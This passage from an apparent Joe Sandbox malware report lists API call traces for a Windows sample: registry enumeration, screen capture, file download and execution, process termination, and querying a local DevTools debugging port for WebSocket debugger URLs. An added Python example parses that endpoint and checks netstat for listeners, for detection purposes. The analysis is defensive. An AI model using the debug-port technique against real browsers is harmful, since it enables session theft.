                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: 4cf845848922b73f549db7e05614a057494a940c801565792552c92bb9803df8
                                • Instruction ID: e69661d061f25cde6f7b4693da33a96028e59b71e5061308947043cbee0d2f47
                                • Opcode Fuzzy Hash: 4cf845848922b73f549db7e05614a057494a940c801565792552c92bb9803df8
                                • Instruction Fuzzy Hash: 1C025030A01205CFDB25DF55DA88BAEB7B9FF44325F198069E4099B3A1DBB5DC42CB81
                                APIs
                                  • Part of subcall function 009D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 009D71FE
                                • RegOpenKeyExA.ADVAPI32(?,010CB318,00000000,00020019,?), ref: 009D37BD
                                • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 009D37F7
                                • wsprintfA.USER32 ref: 009D3822
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 009D3840
                                • RegCloseKey.ADVAPI32(?), ref: 009D384E
                                • RegCloseKey.ADVAPI32(?), ref: 009D3858
                                • RegQueryValueExA.ADVAPI32(?,010CEA20,00000000,000F003F,?,?), ref: 009D38A1
                                • lstrlen.KERNEL32(?), ref: 009D38B6
                                • RegQueryValueExA.ADVAPI32(?,010CEC30,00000000,000F003F,?,00000400), ref: 009D3927
                                • RegCloseKey.ADVAPI32(?), ref: 009D3972
                                • RegCloseKey.ADVAPI32(?), ref: 009D3989
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 13140697-3278919252
                                • Opcode ID: 72752819828df383a03224150e2e22d2db9790925511105edbb8bbcf1f32fbef
                                • Instruction ID: b9f86294173991816e6d3ac72f34a7544f2451eca5ba22ce09cb4ef2008a57aa
                                • Opcode Fuzzy Hash: 72752819828df383a03224150e2e22d2db9790925511105edbb8bbcf1f32fbef
                                • Instruction Fuzzy Hash: F1916D72900249DFCB10DFA4DD84AEEB7B9FB88311F14C56AE509AB351DB31AE45CB90
                                APIs
                                • InternetOpenA.WININET(009DCFEC,00000001,00000000,00000000,00000000), ref: 009B90DF
                                • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 009B90FC
                                • InternetCloseHandle.WININET(00000000), ref: 009B9109
                                • InternetReadFile.WININET(?,?,?,00000000), ref: 009B9166
                                • InternetReadFile.WININET(00000000,?,00001000,?), ref: 009B9197
                                • InternetCloseHandle.WININET(00000000), ref: 009B91A2
                                • InternetCloseHandle.WININET(00000000), ref: 009B91A9
                                • strlen.MSVCRT ref: 009B91BA
                                • strlen.MSVCRT ref: 009B91ED
                                • strlen.MSVCRT ref: 009B922E
                                • strlen.MSVCRT ref: 009B924C
                                  • Part of subcall function 009B8980: std::_Xinvalid_argument.LIBCPMT ref: 009B8996
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                • API String ID: 1530259920-2144369209
                                • Opcode ID: 0b0e39d2561467a94082ef1fca795b6e922db498d89a3868657d70ec228b7d6e
                                • Instruction ID: e33d08467e909514c58cf287a0c7c93a6d107346005d4b8238ed8ec584763d09
                                • Opcode Fuzzy Hash: 0b0e39d2561467a94082ef1fca795b6e922db498d89a3868657d70ec228b7d6e
                                • Instruction Fuzzy Hash: 0E51D571A50245ABDB10DBA9DC85FDEF7BDDB88720F144069F504A7280DBB4E9448BA1
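The function listed above (InternetOpenUrlA on http://localhost:9229/json, followed by strlen-based scanning for the markers "webSocketDebuggerUrl": and "ws://) reads the target-discovery endpoint of the DevTools/Inspector protocol, which a browser or Node process exposes when started with a remote-debugging or --inspect flag, and pulls the WebSocket debugger URL out of the response. The Python below is an added example, not code from this report or from the analysed sample: it shows what such a consumer extracts, once with a proper JSON parse and once with the marker scan that the string references and strlen calls suggest (that the binary scans rather than parses is an inference from the listing, not something the report states), and adds the host-side check an analyst would run for a listener on that port. The /json body and the netstat lines are constructed; ids, titles and PIDs are made up.

```python
"""Added example, not code from the Joe Sandbox report or from the analysed
sample: a Python re-implementation of what the function at 009B90DF appears
to do with the body of http://localhost:9229/json, next to the host-side
check an analyst would run. Every input below is constructed."""
import json
import re
from typing import List, Tuple

# Constructed stand-in for a DevTools-protocol target list as served on
# /json by a browser or Node process started with a remote-debugging or
# --inspect flag. Ids, titles and URLs are made up.
SAMPLE_JSON_BODY = json.dumps([
    {"id": "A1B2C3", "title": "New Tab", "type": "page",
     "url": "chrome://newtab/",
     "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/A1B2C3"},
    {"id": "D4E5F6", "title": "background", "type": "service_worker",
     "url": "chrome-extension://abcdef/sw.js",
     "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/D4E5F6"},
])

# Markers exactly as they appear in the function's string references.
KEY_MARKER = '"webSocketDebuggerUrl":'
VAL_MARKER = '"ws://'


def ws_urls_from_json(body: str) -> List[str]:
    """Proper parse: return every ws:// debugger URL in the target list."""
    try:
        targets = json.loads(body)
    except json.JSONDecodeError:
        return []
    if not isinstance(targets, list):
        return []
    return [t["webSocketDebuggerUrl"] for t in targets
            if isinstance(t, dict)
            and str(t.get("webSocketDebuggerUrl", "")).startswith("ws://")]


def ws_urls_by_scan(body: str) -> List[str]:
    """Marker scan, the way code built on strlen/substring calls would do it:
    find the key marker, then the next quoted ws:// value, and repeat."""
    urls = []
    pos = 0
    while True:
        k = body.find(KEY_MARKER, pos)
        if k < 0:
            break
        v = body.find(VAL_MARKER, k + len(KEY_MARKER))
        if v < 0:
            break
        end = body.find('"', v + 1)          # closing quote of the value
        if end < 0:
            break
        urls.append(body[v + 1:end])         # drop the opening quote
        pos = end + 1
    return urls


# Host-side check: the output of `netstat -ano` (Windows column layout)
# fed to this function reports who is listening on the port the sample polls.
LISTEN_RE = re.compile(
    r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$", re.IGNORECASE)

# Constructed netstat lines; addresses and PIDs are made up.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    127.0.0.1:9229         0.0.0.0:0              LISTENING       4488
  TCP    192.168.1.20:49712     203.0.113.5:443        ESTABLISHED     3100
"""


def debug_port_listeners(netstat_output: str, port: int = 9229) -> List[Tuple[str, int]]:
    """Return (local address, PID) for each LISTENING TCP socket on `port`."""
    hits = []
    for line in netstat_output.splitlines():
        m = LISTEN_RE.match(line)
        if m and int(m.group(2)) == port:
            hits.append((m.group(1), int(m.group(3))))
    return hits


if __name__ == "__main__":
    print("parsed:", ws_urls_from_json(SAMPLE_JSON_BODY))
    print("scanned:", ws_urls_by_scan(SAMPLE_JSON_BODY))
    print("listeners on 9229:", debug_port_listeners(SAMPLE_NETSTAT))
```

Two caveats for anyone turning this into a detection. A listener on 9229 is not conclusive on its own: that port is also the default of Node's inspector, so correlate the owning PID with its command line (a browser process carrying a remote-debugging flag is the interesting case) and with the InternetOpenUrlA request seen here. And the marker scan is only as reliable as the order of fields in the body; a target whose debugger URL is not ws:// would make it pair the key with the next target's value, which is why tooling should use the JSON parse and treat the scan purely as a model of the sample's behaviour.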
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 009D16A1
                                • lstrcpy.KERNEL32(00000000,010BA8E8), ref: 009D16CC
                                • lstrlen.KERNEL32(?), ref: 009D16D9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D16F6
                                • lstrcat.KERNEL32(00000000,?), ref: 009D1704
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D172A
                                • lstrlen.KERNEL32(010CE158), ref: 009D173F
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D1762
                                • lstrcat.KERNEL32(00000000,010CE158), ref: 009D176A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D1792
                                • ShellExecuteEx.SHELL32(?), ref: 009D17CD
                                • ExitProcess.KERNEL32 ref: 009D1803
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                • String ID: <
                                • API String ID: 3579039295-4251816714
                                • Opcode ID: eaac4e35d83688a8c9b3957e71433dee30a89b95938710e88d06976e8f37af2a
                                • Instruction ID: e2cfdfc529ba377b56ac8ce9ce8f4674333d2cf97db77652bed4868c99e8d8a4
                                • Opcode Fuzzy Hash: eaac4e35d83688a8c9b3957e71433dee30a89b95938710e88d06976e8f37af2a
                                • Instruction Fuzzy Hash: 27514F71A01659ABDB11DFA4DE84A9EB7FDEF84300F548126E509E7351DF30AE05CB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CEFE4
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CF012
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009CF026
                                • lstrlen.KERNEL32(00000000), ref: 009CF035
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 009CF053
                                • StrStrA.SHLWAPI(00000000,?), ref: 009CF081
                                • lstrlen.KERNEL32(?), ref: 009CF094
                                • lstrlen.KERNEL32(00000000), ref: 009CF0B2
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 009CF0FF
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 009CF13F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$AllocLocal
                                • String ID: ERROR
                                • API String ID: 1803462166-2861137601
                                • Opcode ID: 1402d16487eb6af9cd30e407485334937534e89acf732df9dbb897b4b5a760ae
                                • Instruction ID: f268e858af080aeb666073d4b394e29eabe07935c457f493b5ee4f225225c820
                                • Opcode Fuzzy Hash: 1402d16487eb6af9cd30e407485334937534e89acf732df9dbb897b4b5a760ae
                                • Instruction Fuzzy Hash: 9851A2319101419FCB21EF74DE59FAE77E9EF85720F05446DF84AAB252DA30DC018792
                                APIs
                                • GetEnvironmentVariableA.KERNEL32(010C8B58,00BE9BD8,0000FFFF), ref: 009BA026
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BA053
                                • lstrlen.KERNEL32(00BE9BD8), ref: 009BA060
                                • lstrcpy.KERNEL32(00000000,00BE9BD8), ref: 009BA08A
                                • lstrlen.KERNEL32(009E4C4C), ref: 009BA095
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BA0B2
                                • lstrcat.KERNEL32(00000000,009E4C4C), ref: 009BA0BE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BA0E4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BA0EF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BA114
                                • SetEnvironmentVariableA.KERNEL32(010C8B58,00000000), ref: 009BA12F
                                • LoadLibraryA.KERNEL32(010B5010), ref: 009BA143
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                • String ID:
                                • API String ID: 2929475105-0
                                • Opcode ID: ff932536fb8cdd3073b4db814a61d3630d6144bb46b99ea1aa27823608bf434f
                                • Instruction ID: b56c8f5dd169aa06436da26921e64e9ec22a133d70c4c7b8c789e410a167717c
                                • Opcode Fuzzy Hash: ff932536fb8cdd3073b4db814a61d3630d6144bb46b99ea1aa27823608bf434f
                                • Instruction Fuzzy Hash: 7091FB30600A409FD7319FA8DE88AE637B9EB94725F504558F4199F261EFB5DC40CBD2
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009CC8A2
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009CC8D1
                                • lstrlen.KERNEL32(00000000), ref: 009CC8FC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CC932
                                • StrCmpCA.SHLWAPI(00000000,009E4C3C), ref: 009CC943
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: 94cc1ec550cc4f056b701ba56158a1da37ed2d81bc5b3f9f732f47b9baeecbba
                                • Instruction ID: 663eb4e8290342e6082347a5bc5d66e12d7079218d44e9417f5f3600ef6ef2d7
                                • Opcode Fuzzy Hash: 94cc1ec550cc4f056b701ba56158a1da37ed2d81bc5b3f9f732f47b9baeecbba
                                • Instruction Fuzzy Hash: 6261B0B1D1121A9BDB10EFB58989FEE7BFCAF49340F144469E849E7241DB348D058B92
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,009D0CF0), ref: 009D4276
                                • GetDesktopWindow.USER32 ref: 009D4280
                                • GetWindowRect.USER32(00000000,?), ref: 009D428D
                                • SelectObject.GDI32(00000000,00000000), ref: 009D42BF
                                • GetHGlobalFromStream.COMBASE(009D0CF0,?), ref: 009D4336
                                • GlobalLock.KERNEL32(?), ref: 009D4340
                                • GlobalSize.KERNEL32(?), ref: 009D434D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                • String ID:
                                • API String ID: 1264946473-0
                                • Opcode ID: f6164f577f977ee28ae56c0b5789844103373f5aa5f16b5db63b2993603e7d48
                                • Instruction ID: bd9afbea9fa2589e188356344d46a3eb282a9ed5367e6b14355bdc9e22e334e2
                                • Opcode Fuzzy Hash: f6164f577f977ee28ae56c0b5789844103373f5aa5f16b5db63b2993603e7d48
                                • Instruction Fuzzy Hash: DD514E75910208AFDB10EFA4DD85AEEB7B9EF88310F104519F905E7251DB34AD058BA0
                                APIs
                                • lstrcat.KERNEL32(?,010CED38), ref: 009CE00D
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 009CE037
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CE06F
                                • lstrcat.KERNEL32(?,00000000), ref: 009CE07D
                                • lstrcat.KERNEL32(?,?), ref: 009CE098
                                • lstrcat.KERNEL32(?,?), ref: 009CE0AC
                                • lstrcat.KERNEL32(?,010BA8C0), ref: 009CE0C0
                                • lstrcat.KERNEL32(?,?), ref: 009CE0D4
                                • lstrcat.KERNEL32(?,010CDAF0), ref: 009CE0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CE11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 009CE126
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 4230089145-0
                                • Opcode ID: e665da5100e94ab62e71cc70382173ee265e8a723481af6bb1486a77771d763f
                                • Instruction ID: 4003f103f3f2828de8863fae16b8e3d288c9a5e223a02c9a1a71e4cf014e90ac
                                • Opcode Fuzzy Hash: e665da5100e94ab62e71cc70382173ee265e8a723481af6bb1486a77771d763f
                                • Instruction Fuzzy Hash: 35619B71D1011CABCB65DF64CD84BDDB7B8BF88310F5049A8A60AA7291DF70AF858F90
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B6AFF
                                • InternetOpenA.WININET(009DCFEC,00000001,00000000,00000000,00000000), ref: 009B6B2C
                                • StrCmpCA.SHLWAPI(?,010CF498), ref: 009B6B4A
                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 009B6B6A
                                • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009B6B88
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 009B6BA1
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 009B6BC6
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 009B6BF0
                                • CloseHandle.KERNEL32(00000000), ref: 009B6C10
                                • InternetCloseHandle.WININET(00000000), ref: 009B6C17
                                • InternetCloseHandle.WININET(?), ref: 009B6C21
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                • String ID:
                                • API String ID: 2500263513-0
                                • Opcode ID: 5d453167fe3700ea86f7c65856dba7bb0a182c9fb6a8931e4436b66c69d64544
                                • Instruction ID: b2053a2f224b00b12e230fe9935f0585b0ec1ff32fe5e22a9e85c66346e68b05
                                • Opcode Fuzzy Hash: 5d453167fe3700ea86f7c65856dba7bb0a182c9fb6a8931e4436b66c69d64544
                                • Instruction Fuzzy Hash: 35418E71A00215ABDB20DF64DD85FEE77BCEB44711F104864FA09EB280EF74AE448BA4
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BBC1F
                                • lstrlen.KERNEL32(00000000), ref: 009BBC52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BBC7C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BBC84
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BBCAC
                                • lstrlen.KERNEL32(009E4AD4), ref: 009BBD23
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: 3dd96479e7784b0673eee8613a3e20f8b8dcafe0ca0933829d0d8a421f95d816
                                • Instruction ID: 1e9d110d4b29212653a0abe5ceee69f74d8d6ed4672aaf3974fc18e4b11ecd17
                                • Opcode Fuzzy Hash: 3dd96479e7784b0673eee8613a3e20f8b8dcafe0ca0933829d0d8a421f95d816
                                • Instruction Fuzzy Hash: 1DA150706012058FCB25DF68DB89BEEB7B4EF84325F198069E409AB2E1DB75DC41CB51
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 009D5F2A
                                • std::_Xinvalid_argument.LIBCPMT ref: 009D5F49
                                • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 009D6014
                                • memmove.MSVCRT(00000000,00000000,?), ref: 009D609F
                                • std::_Xinvalid_argument.LIBCPMT ref: 009D60D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 1975243496-4289949731
                                • Opcode ID: fe59dd4edf562330a8aad28bf4c9a4070fa5af12cdfb863d0b2aaf7e7a4d4622
                                • Instruction ID: 40b4371152cc5df8f286703739e969dbee143d480d6836372c5ed8a0746874b9
                                • Opcode Fuzzy Hash: fe59dd4edf562330a8aad28bf4c9a4070fa5af12cdfb863d0b2aaf7e7a4d4622
                                • Instruction Fuzzy Hash: 1D61AD70740505DBDB28CF5DCDD4A6EB7B6EF84304B298A1AE4928B781C731ED80CB94
                                APIs
                                • memset.MSVCRT ref: 009D451A
                                • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,009C4F39), ref: 009D4545
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009D454C
                                • wsprintfW.USER32 ref: 009D455B
                                • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 009D45CA
                                • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 009D45D9
